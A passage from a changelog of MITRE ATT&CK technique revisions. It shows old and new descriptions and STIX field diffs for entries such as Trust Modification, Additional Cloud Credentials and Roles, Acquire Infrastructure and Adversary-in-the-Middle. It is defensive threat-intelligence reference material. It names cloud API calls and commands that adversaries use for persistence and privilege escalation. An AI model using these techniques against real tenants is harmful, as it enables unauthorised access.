Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager. Access to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. SaaS-based configuration management services may allow for broad [Cloud Administration Command](https://attack.mitre.org/techniques/T1651) on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001) to communicate back to adversary owned infrastructure.(Citation: Mitiga Security Advisory: SSM Agent as Remote Access Trojan) Network infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation) The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to access specific functionality.
x_mitre_version2.23.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'SpecterOps Lateral Movement from Azure to On-Prem AD 2020', 'description': 'Andy Robbins. (2020, August 17). Death from Above: Lateral Movement from Azure to On-Prem AD. Retrieved March 13, 2023.', 'url': 'https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d'}
external_references{'source_name': 'Mitiga Security Advisory: SSM Agent as Remote Access Trojan', 'description': 'Ariel Szarf, Or Aspir. (n.d.). Mitiga Security Advisory: Abusing the SSM Agent as a Remote Access Trojan. Retrieved January 31, 2024.', 'url': 'https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan'}
x_mitre_contributorsTamir Yehuda
x_mitre_platformsSaaS

[T1484.002] Domain or Tenant Policy Modification: Trust Modification

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1Adversaries may add new domain trusts or modify the propertit1Adversaries may add new domain trusts, modify the properties
>es of existing domain trusts to evade defenses and/or elevat> of existing domain trusts, or otherwise change the configur
>e privileges. Domain trust details, such as whether or not a>ation of trust relationships between domains and tenants to 
> domain is federated, allow authentication and authorization>evade defenses and/or elevate privileges.Trust details, such
> properties to apply between domains for the purpose of acce> as whether or not user identities are federated, allow auth
>ssing shared resources.(Citation: Microsoft - Azure AD Feder>entication and authorization properties to apply between dom
>ation) These trust objects may include accounts, credentials>ains or tenants for the purpose of accessing shared resource
>, and other authentication material applied to servers, toke>s.(Citation: Microsoft - Azure AD Federation) These trust ob
>ns, and domains.  Manipulating the domain trusts may allow a>jects may include accounts, credentials, and other authentic
>n adversary to escalate privileges and/or evade defenses by >ation material applied to servers, tokens, and domains.  Man
>modifying settings to add objects which they control. For ex>ipulating these trusts may allow an adversary to escalate pr
>ample, this may be used to forge [SAML Tokens](https://attac>ivileges and/or evade defenses by modifying settings to add 
>k.mitre.org/techniques/T1606/002), without the need to compr>objects which they control. For example, in Microsoft Active
>omise the signing certificate to forge new credentials. Inst> Directory (AD) environments, this may be used to forge [SAM
>ead, an adversary can manipulate domain trusts to add their >L Tokens](https://attack.mitre.org/techniques/T1606/002) wit
>own signing certificate. An adversary may also convert a dom>hout the need to compromise the signing certificate to forge
>ain to a federated domain, which may enable malicious trust > new credentials. Instead, an adversary can manipulate domai
>modifications such as altering the claim issuance rules to l>n trusts to add their own signing certificate. An adversary 
>og in any valid set of credentials as a specified user.(Cita>may also convert an AD domain to a federated domain using Ac
>tion: AADInternals zure AD Federated Domain) >tive Directory Federation Services (AD FS), which may enable
 > malicious trust modifications such as altering the claim is
 >suance rules to log in any valid set of credentials as a spe
 >cified user.(Citation: AADInternals zure AD Federated Domain
 >)   An adversary may also add a new federated identity provi
 >der to an identity tenant such as Okta, which may enable the
 > adversary to authenticate as any user of the tenant.(Citati
 >on: Okta Cross-Tenant Impersonation 2023)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21 16:09:14.555000+00:002024-04-19 04:27:51.388000+00:00
nameDomain Trust ModificationTrust Modification
descriptionAdversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) An adversary may also add a new federated identity provider to an identity tenant such as Okta, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023)
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Okta Cross-Tenant Impersonation 2023', 'description': 'Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant Impersonation: Prevention and Detection. Retrieved February 15, 2024.', 'url': 'https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection'}
x_mitre_contributorsObsidian Security
x_mitre_data_sourcesApplication Log: Application Log Content
x_mitre_platformsSaaS
Minor Version Changes

[T1548] Abuse Elevation Control Mechanism

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may circumvent mechanisms designed to control elt1Adversaries may circumvent mechanisms designed to control el
>evate privileges to gain higher-level permissions. Most mode>evate privileges to gain higher-level permissions. Most mode
>rn systems contain native elevation control mechanisms that >rn systems contain native elevation control mechanisms that 
>are intended to limit privileges that a user can perform on >are intended to limit privileges that a user can perform on 
>a machine. Authorization has to be granted to specific users>a machine. Authorization has to be granted to specific users
> in order to perform tasks that can be considered of higher > in order to perform tasks that can be considered of higher 
>risk. An adversary can perform several methods to take advan>risk.(Citation: TechNet How UAC Works)(Citation: sudo man pa
>tage of built-in control mechanisms in order to escalate pri>ge 2018) An adversary can perform several methods to take ad
>vileges on a system.>vantage of built-in control mechanisms in order to escalate 
 >privileges on a system.(Citation: OSX Keydnap malware)(Citat
 >ion: Fortinet Fareit)

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-02 00:47:11.369000+00:002024-04-15 20:52:09.908000+00:00
descriptionAdversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'TechNet How UAC Works', 'description': 'Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.', 'url': 'https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works'}
external_references{'source_name': 'OSX Keydnap malware', 'description': 'Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.', 'url': 'https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/'}
external_references{'source_name': 'Fortinet Fareit', 'description': 'Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.', 'url': 'https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware'}
external_references{'source_name': 'sudo man page 2018', 'description': 'Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.', 'url': 'https://www.sudo.ws/'}

[T1583] Acquire Infrastructure

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may buy, lease, or rent infrastructure that can t1Adversaries may buy, lease, rent, or obtain infrastructure t
>be used during targeting. A wide variety of infrastructure e>hat can be used during targeting. A wide variety of infrastr
>xists for hosting and orchestrating adversary operations. In>ucture exists for hosting and orchestrating adversary operat
>frastructure solutions include physical or cloud servers, do>ions. Infrastructure solutions include physical or cloud ser
>mains, and third-party web services.(Citation: TrendmicroHid>vers, domains, and third-party web services.(Citation: Trend
>eoutsLease) Additionally, botnets are available for rent or >microHideoutsLease) Some infrastructure providers offer free
>purchase.  Use of these infrastructure solutions allows adve> trial periods, enabling infrastructure acquisition at limit
>rsaries to stage, launch, and execute operations. Solutions >ed to no cost.(Citation: Free Trial PurpleUrchin) Additional
>may help adversary operations blend in with traffic that is >ly, botnets are available for rent or purchase.  Use of thes
>seen as normal, such as contacting third-party web services >e infrastructure solutions allows adversaries to stage, laun
>or acquiring infrastructure to support [Proxy](https://attac>ch, and execute operations. Solutions may help adversary ope
>k.mitre.org/techniques/T1090), including from residential pr>rations blend in with traffic that is seen as normal, such a
>oxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI P>s contacting third-party web services or acquiring infrastru
>roxies Credential Stuffing)(Citation: Mandiant APT29 Microso>cture to support [Proxy](https://attack.mitre.org/techniques
>ft 365 2022) Depending on the implementation, adversaries ma>/T1090), including from residential proxy services.(Citation
>y use infrastructure that makes it difficult to physically t>: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuf
>ie back to them as well as utilize infrastructure that can b>fing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending
>e rapidly provisioned, modified, and shut down.> on the implementation, adversaries may use infrastructure t
 >hat makes it difficult to physically tie back to them as wel
 >l as utilize infrastructure that can be rapidly provisioned,
 > modified, and shut down.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-02 01:10:09.833000+00:002024-02-28 21:13:02.648000+00:00
descriptionAdversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase. Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase. Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Free Trial PurpleUrchin', 'description': 'Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.', 'url': 'https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/'}

[T1098.001] Account Manipulation: Additional Cloud Credentials

Current version: 2.7

Version changed from: 2.6 → 2.7


Old Description
New Description
t1Adversaries may add adversary-controlled credentials to a clt1Adversaries may add adversary-controlled credentials to a cl
>oud account to maintain persistent access to victim accounts>oud account to maintain persistent access to victim accounts
> and instances within the environment.  For example, adversa> and instances within the environment.  For example, adversa
>ries may add credentials for Service Principals and Applicat>ries may add credentials for Service Principals and Applicat
>ions in addition to existing legitimate credentials in Azure>ions in addition to existing legitimate credentials in Azure
> AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citat> AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citat
>ion: Blue Cloud of Death)(Citation: Blue Cloud of Death Vide>ion: Blue Cloud of Death)(Citation: Blue Cloud of Death Vide
>o) These credentials include both x509 keys and passwords.(C>o) These credentials include both x509 keys and passwords.(C
>itation: Microsoft SolarWinds Customer Guidance) With suffic>itation: Microsoft SolarWinds Customer Guidance) With suffic
>ient permissions, there are a variety of ways to add credent>ient permissions, there are a variety of ways to add credent
>ials including the Azure Portal, Azure command line interfac>ials including the Azure Portal, Azure command line interfac
>e, and Azure or Az PowerShell modules.(Citation: Demystifyin>e, and Azure or Az PowerShell modules.(Citation: Demystifyin
>g Azure AD Service Principals)  In infrastructure-as-a-servi>g Azure AD Service Principals)  In infrastructure-as-a-servi
>ce (IaaS) environments, after gaining access through [Cloud >ce (IaaS) environments, after gaining access through [Cloud 
>Accounts](https://attack.mitre.org/techniques/T1078/004), ad>Accounts](https://attack.mitre.org/techniques/T1078/004), ad
>versaries may generate or import their own SSH keys using ei>versaries may generate or import their own SSH keys using ei
>ther the <code>CreateKeyPair</code> or <code>ImportKeyPair</>ther the <code>CreateKeyPair</code> or <code>ImportKeyPair</
>code> API in AWS or the <code>gcloud compute os-login ssh-ke>code> API in AWS or the <code>gcloud compute os-login ssh-ke
>ys add</code> command in GCP.(Citation: GCP SSH Key Add) Thi>ys add</code> command in GCP.(Citation: GCP SSH Key Add) Thi
>s allows persistent access to instances within the cloud env>s allows persistent access to instances within the cloud env
>ironment without further usage of the compromised cloud acco>ironment without further usage of the compromised cloud acco
>unts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind>unts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind
> the Scenes)  Adversaries may also use the <code>CreateAcces> the Scenes)  Adversaries may also use the <code>CreateAcces
>sKey</code> API in AWS or the <code>gcloud iam service-accou>sKey</code> API in AWS or the <code>gcloud iam service-accou
>nts keys create</code> command in GCP to add access keys to >nts keys create</code> command in GCP to add access keys to 
>an account. If the target account has different permissions >an account. If the target account has different permissions 
>from the requesting account, the adversary may also be able >from the requesting account, the adversary may also be able 
>to escalate their privileges in the environment (i.e. [Cloud>to escalate their privileges in the environment (i.e. [Cloud
> Accounts](https://attack.mitre.org/techniques/T1078/004)).(> Accounts](https://attack.mitre.org/techniques/T1078/004)).(
>Citation: Rhino Security Labs AWS Privilege Escalation)(Cita>Citation: Rhino Security Labs AWS Privilege Escalation)(Cita
>tion: Sysdig ScarletEel 2.0) For example, in Azure AD enviro>tion: Sysdig ScarletEel 2.0) For example, in Azure AD enviro
>nments, an adversary with the Application Administrator role>nments, an adversary with the Application Administrator role
> can add a new set of credentials to their application's ser> can add a new set of credentials to their application's ser
>vice principal. In doing so the adversary would be able to a>vice principal. In doing so the adversary would be able to a
>ccess the service principal’s roles and permissions, which m>ccess the service principal’s roles and permissions, which m
>ay be different from those of the Application Administrator.>ay be different from those of the Application Administrator.
>(Citation: SpecterOps Azure Privilege Escalation)   In AWS e>(Citation: SpecterOps Azure Privilege Escalation)   In AWS e
>nvironments, adversaries with the appropriate permissions ma>nvironments, adversaries with the appropriate permissions ma
>y also use the `sts:GetFederationToken` API call to create a>y also use the `sts:GetFederationToken` API call to create a
> temporary set of credentials tied to the permissions of the> temporary set of credentials to [Forge Web Credentials](htt
> original user account. These credentials may remain valid f>ps://attack.mitre.org/techniques/T1606) tied to the permissi
>or the duration of their lifetime even if the original accou>ons of the original user account. These temporary credential
>nt’s API credentials are deactivated. (Citation: Crowdstrike>s may remain valid for the duration of their lifetime even i
> AWS User Federation Persistence)>f the original account’s API credentials are deactivated. (C
 >itation: Crowdstrike AWS User Federation Persistence)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-03 17:37:24.011000+00:002024-02-28 14:35:00.862000+00:00
descriptionAdversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. (Citation: Crowdstrike AWS User Federation Persistence)Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. (Citation: Crowdstrike AWS User Federation Persistence)
x_mitre_version2.62.7

[T1098.003] Account Manipulation: Additional Cloud Roles

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description
New Description
t1An adversary may add additional roles or permissions to an at1An adversary may add additional roles or permissions to an a
>dversary-controlled cloud account to maintain persistent acc>dversary-controlled cloud account to maintain persistent acc
>ess to a tenant. For example, adversaries may update IAM pol>ess to a tenant. For example, adversaries may update IAM pol
>icies in cloud-based environments or add a new global admini>icies in cloud-based environments or add a new global admini
>strator in Office 365 environments.(Citation: AWS IAM Polici>strator in Office 365 environments.(Citation: AWS IAM Polici
>es and Permissions)(Citation: Google Cloud IAM Policies)(Cit>es and Permissions)(Citation: Google Cloud IAM Policies)(Cit
>ation: Microsoft Support O365 Add Another Admin, October 201>ation: Microsoft Support O365 Add Another Admin, October 201
>9)(Citation: Microsoft O365 Admin Roles) With sufficient per>9)(Citation: Microsoft O365 Admin Roles) With sufficient per
>missions, a compromised account can gain almost unlimited ac>missions, a compromised account can gain almost unlimited ac
>cess to data and settings (including the ability to reset th>cess to data and settings (including the ability to reset th
>e passwords of other admins).(Citation: Expel AWS Attacker) >e passwords of other admins).(Citation: Expel AWS Attacker) 
>(Citation: Microsoft O365 Admin Roles)   This account modifi>(Citation: Microsoft O365 Admin Roles)   This account modifi
>cation may immediately follow [Create Account](https://attac>cation may immediately follow [Create Account](https://attac
>k.mitre.org/techniques/T1136) or other malicious account act>k.mitre.org/techniques/T1136) or other malicious account act
>ivity. Adversaries may also modify existing [Valid Accounts]>ivity. Adversaries may also modify existing [Valid Accounts]
>(https://attack.mitre.org/techniques/T1078) that they have c>(https://attack.mitre.org/techniques/T1078) that they have c
>ompromised. This could lead to privilege escalation, particu>ompromised. This could lead to privilege escalation, particu
>larly if the roles added allow for lateral movement to addit>larly if the roles added allow for lateral movement to addit
>ional accounts.  For example, in AWS environments, an advers>ional accounts.  For example, in AWS environments, an advers
>ary with appropriate permissions may be able to use the <cod>ary with appropriate permissions may be able to use the <cod
>e>CreatePolicyVersion</code> API to define a new version of >e>CreatePolicyVersion</code> API to define a new version of 
>an IAM policy or the <code>AttachUserPolicy</code> API to at>an IAM policy or the <code>AttachUserPolicy</code> API to at
>tach an IAM policy with additional or distinct permissions t>tach an IAM policy with additional or distinct permissions t
>o a compromised user account.(Citation: Rhino Security Labs >o a compromised user account.(Citation: Rhino Security Labs 
>AWS Privilege Escalation)>AWS Privilege Escalation)  In some cases, adversaries may ad
 >d roles to adversary-controlled accounts outside the victim 
 >cloud tenant. This allows these external accounts to perform
 > actions inside the victim tenant without requiring the adve
 >rsary to [Create Account](https://attack.mitre.org/technique
 >s/T1136) or modify a victim-owned account.(Citation: Invictu
 >s IR DangerDev 2024)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-03 17:37:41.250000+00:002024-03-29 18:29:06.873000+00:00
descriptionAn adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker) (Citation: Microsoft O365 Admin Roles) This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts. For example, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker) (Citation: Microsoft O365 Admin Roles) This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts. For example, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation) In some cases, adversaries may add roles to adversary-controlled accounts outside the victim cloud tenant. This allows these external accounts to perform actions inside the victim tenant without requiring the adversary to [Create Account](https://attack.mitre.org/techniques/T1136) or modify a victim-owned account.(Citation: Invictus IR DangerDev 2024)
x_mitre_version2.32.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Invictus IR DangerDev 2024', 'description': 'Invictus Incident Response. (2024, January 31). The curious case of DangerDev@protonmail.me. Retrieved March 19, 2024.', 'url': 'https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me'}

[T1557] Adversary-in-the-Middle

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description
New Description
t1Adversaries may attempt to position themselves between two ot1Adversaries may attempt to position themselves between two o
>r more networked devices using an adversary-in-the-middle (A>r more networked devices using an adversary-in-the-middle (A
>iTM) technique to support follow-on behaviors such as [Netwo>iTM) technique to support follow-on behaviors such as [Netwo
>rk Sniffing](https://attack.mitre.org/techniques/T1040), [Tr>rk Sniffing](https://attack.mitre.org/techniques/T1040), [Tr
>ansmitted Data Manipulation](https://attack.mitre.org/techni>ansmitted Data Manipulation](https://attack.mitre.org/techni
>ques/T1565/002), or replay attacks ([Exploitation for Creden>ques/T1565/002), or replay attacks ([Exploitation for Creden
>tial Access](https://attack.mitre.org/techniques/T1212)). By>tial Access](https://attack.mitre.org/techniques/T1212)). By
> abusing features of common networking protocols that can de> abusing features of common networking protocols that can de
>termine the flow of network traffic (e.g. ARP, DNS, LLMNR, e>termine the flow of network traffic (e.g. ARP, DNS, LLMNR, e
>tc.), adversaries may force a device to communicate through >tc.), adversaries may force a device to communicate through 
>an adversary controlled system so they can collect informati>an adversary controlled system so they can collect informati
>on or perform additional actions.(Citation: Rapid7 MiTM Basi>on or perform additional actions.(Citation: Rapid7 MiTM Basi
>cs)  For example, adversaries may manipulate victim DNS sett>cs)  For example, adversaries may manipulate victim DNS sett
>ings to enable other malicious activities such as preventing>ings to enable other malicious activities such as preventing
>/redirecting users from accessing legitimate sites and/or pu>/redirecting users from accessing legitimate sites and/or pu
>shing additional malware.(Citation: ttint_rat)(Citation: dns>shing additional malware.(Citation: ttint_rat)(Citation: dns
>_changer_trojans)(Citation: ad_blocker_with_miner) Adversari>_changer_trojans)(Citation: ad_blocker_with_miner) Adversari
>es may also manipulate DNS and leverage their position in or>es may also manipulate DNS and leverage their position in or
>der to intercept user credentials and session cookies.(Citat>der to intercept user credentials, including access tokens (
>ion: volexity_0day_sophos_FW) [Downgrade Attack](https://att>[Steal Application Access Token](https://attack.mitre.org/te
>ack.mitre.org/techniques/T1562/010)s can also be used to est>chniques/T1528)) and session cookies ([Steal Web Session Coo
>ablish an AiTM position, such as by negotiating a less secur>kie](https://attack.mitre.org/techniques/T1539)).(Citation: 
>e, deprecated, or weaker version of communication protocol (>volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade
>SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgra> Attack](https://attack.mitre.org/techniques/T1562/010)s can
>de_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlse> also be used to establish an AiTM position, such as by nego
>minar_downgrade_att)  Adversaries may also leverage the AiTM>tiating a less secure, deprecated, or weaker version of comm
> position to attempt to monitor and/or modify traffic, such >unication protocol (SSL/TLS) or encryption algorithm.(Citati
>as in [Transmitted Data Manipulation](https://attack.mitre.o>on: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att
>rg/techniques/T1565/002). Adversaries can setup a position s>_tls)(Citation: tlseminar_downgrade_att)  Adversaries may al
>imilar to AiTM to prevent traffic from flowing to the approp>so leverage the AiTM position to attempt to monitor and/or m
>riate destination, potentially to [Impair Defenses](https://>odify traffic, such as in [Transmitted Data Manipulation](ht
